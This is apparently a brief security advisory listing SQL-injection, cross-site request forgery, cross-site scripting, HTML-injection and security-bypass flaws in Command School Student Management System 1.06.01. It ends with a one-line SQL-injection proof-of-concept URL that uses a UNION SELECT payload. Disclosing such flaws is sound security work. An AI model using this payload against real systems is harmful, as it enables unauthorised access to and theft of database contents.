Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()